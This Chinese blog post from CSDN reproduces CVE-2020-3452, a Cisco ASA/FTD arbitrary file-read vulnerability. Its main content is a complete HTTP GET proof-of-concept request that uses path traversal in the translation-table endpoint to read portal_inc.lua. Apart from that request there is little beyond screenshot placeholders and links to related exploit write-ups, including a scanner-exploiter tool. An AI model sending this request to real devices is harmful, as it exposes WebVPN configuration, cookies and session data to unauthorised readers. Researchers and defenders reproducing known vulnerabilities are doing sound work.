CVE-2020-3452(CISCO ASA设备任意文件读取漏洞复现)

最新推荐文章于 2024-04-15 19:05:33 发布
最新推荐文章于 2024-04-15 19:05:33 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/109897678
版权

抓包
在这里插入图片描述
POC

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

在这里插入图片描述

Min1996
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现CVE-2020-3452CISCO ASA远程任意文件读取
记录并分享学习安全的知识点..
04-27 1094
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 Cisco官方 发布了 Cisco ASA 软件和 FTD 软件的 Web 接口存在目录遍历导致任意文件读取 的风险通告,该漏洞编号为 CVE-2020-3452。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 漏洞等级:中危。 二、影响版本 Cisco ASA:<= 9.6 Cisco ASA:9.7 ,...
CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
墨痕诉清风的博客
10-08 2906
Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞,允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件,此漏洞不能用于获取对ASA或FTD系统文件或底层操作系统(OS)文件的访问,所以只能读取web系统目录的文件,比如webvpn的配置文件、书签、网络cookies、部分网络内容和超文本传输协议网址等信息。.
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
thelostworld
07-23 1190
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一、漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 二、影响范围 以下是CVE-2020-3452漏洞受.
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞复现
tigerOrtiger的博客
07-24 5825
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞 0x01 前言 昨天深夜4点cisco asa 爆出了CVE-2020-3452漏洞,此漏洞可以在未验证的情况下进行任意文件读取。 然后今天早上各大漏洞平台中找各种POC。 但是都只有漏洞通告 于是去推特上一看,已经有大佬把poc公布出来了。 推特是个好东西 :) LOL 0x02 漏洞信息 根据ciso官方通报的信息来看,【入口: 官方信息】 该漏洞是由于受影响的设备处理的HTTP请求中的URL缺乏正确的输入验证所致。攻击者可以通过将
CISCO ASA远程任意文件读取漏洞CVE-2020-3452复现
玄道的网安博客
07-30 2955
简介 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 影响版本 Cisco ASA 设备影响版本: <9.6.1 9.6 < 9.6.4.42 9.71 9.8
CISCO ASA远程任意文件读取
kukudeshuo的博客
01-17 1053
CISCO ASA远程任意文件读取 简介 Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备漏洞描述 Cisco Adaptive Security Appliance (ASA)防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cook
CISCO-CVE-2020-3452-Scanner-Exploiter:CISCO CVE-2020-3452 扫描器和漏洞利用程序
05-29
它将从 shodan 扫描目标服务器,然后找到存在 CVE-2020-3452(思科自适应安全设备和 FTD 未授权远程文件读取)的易受攻击的服务器。 关于 思科自适应安全设备 (ASA) 软件和思科 Firepower 威胁防御 (FTD) 软件的 Web...
CVE-2020-3187漏洞复现
初岄的博客
06-07 2206
CVE-2020-3187漏洞复现
CVE-2020-3452漏洞复现
windy_ll的博客
11-21 3139
一、前言     前端时间碰到了该漏洞,记录一下! 二、漏洞介绍     该漏洞为思科ASA设备和FTD设备的未授权任意文件读取漏洞,但仅能读取到WEB目录下的文件,影响版本如下: Cisco ASA:<= 9.6 Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14 Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0 三、漏洞复现     首先利用zoomeye或者f
CVE-2020-11651复现
weixin_44576411的博客
12-23 530
CVE-2020-11651(身份验证绕过漏洞) 简述 漏洞原因: SaltStack是python的架构开发工具 但是它的ClearFuncs类会处理非认证的请求和暴露_send_pub()方法,而且还会暴露_prep_auth_info()方法。 漏洞使用方法 攻击者可以通过构造恶意请求,绕过salt master 的验证逻辑,调用相关的未授权功能,从而造成远程命令执行漏洞。 ClearFuncs类处理未经身份验证的请求,并且无意中公开了_send_pub()方法,该方法可用于直接在master服务器上
CVE-2020-0796蓝屏POC 漏洞复现
ltt440888的博客
03-19 6403
微软SMBv3远程代码执行漏洞CVE-2020-0796) 1、漏洞描述 微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaC...
CVE-2020-10977复现过程
weixin_39811856的博客
11-30 1779
老规矩上一下漏洞详情 漏洞详情: GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 POC: #!/usr/bin/env python3 import sys import jso.
Ladon插件-CVE-2020-1472域控提权漏洞EXP
K8哥哥
09-16 1283
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
python工具CISCO ASA设备任意文件读取
天行健,君子以自强不息
11-12 189
各家兴便是天下大同
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6(2),2024年最新面试题+笔记+项目实战
最新发布
04-15 1158
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 8031
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
爬虫项目总结(六)(随机user-agent)
weixin_44327334的博客
11-02 455
首先在settings.py中设置 USER_AGENT = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.418
Apache Flink CVE-2020-17518:远程文件写入漏洞分析
"Apache Flink的CVE-2020-17518是一个严重的安全漏洞,它允许远程攻击者通过REST API进行目录遍历,从而实现任意文件写入。此漏洞影响Apache Flink的1.5.1至1.11.2版本。攻击者可以通过构造特殊的HTTP请求头来将文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值